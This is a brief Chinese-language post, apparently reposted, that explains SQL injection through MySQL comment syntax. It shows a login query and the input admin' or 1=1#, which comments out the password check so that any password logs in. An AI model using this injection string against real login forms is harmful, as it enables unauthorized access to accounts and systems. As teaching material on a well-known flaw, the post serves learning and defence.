SQL注入之注释

    xiaoxiao2026-03-28  14

    //  这里以MySQL为例子 select name,pass from tbAdmin where name='admin' and pass='123456' 输入:admin' or 1=1# SQL变成下面这个样子: select name,pass from tbAdmin where name='admin' or 1=1#' and pass='123456'  你会发现随便输入密码,都可以随便登陆了。。。 ----------------------------------------------------- select * from tbAdmin # 这是MySQL注释 select * from tbAdmin /* 这是MySQL注释 */
    转载请注明原文地址: https://ju.6miu.com/read-1308263.html
    最新回复(0)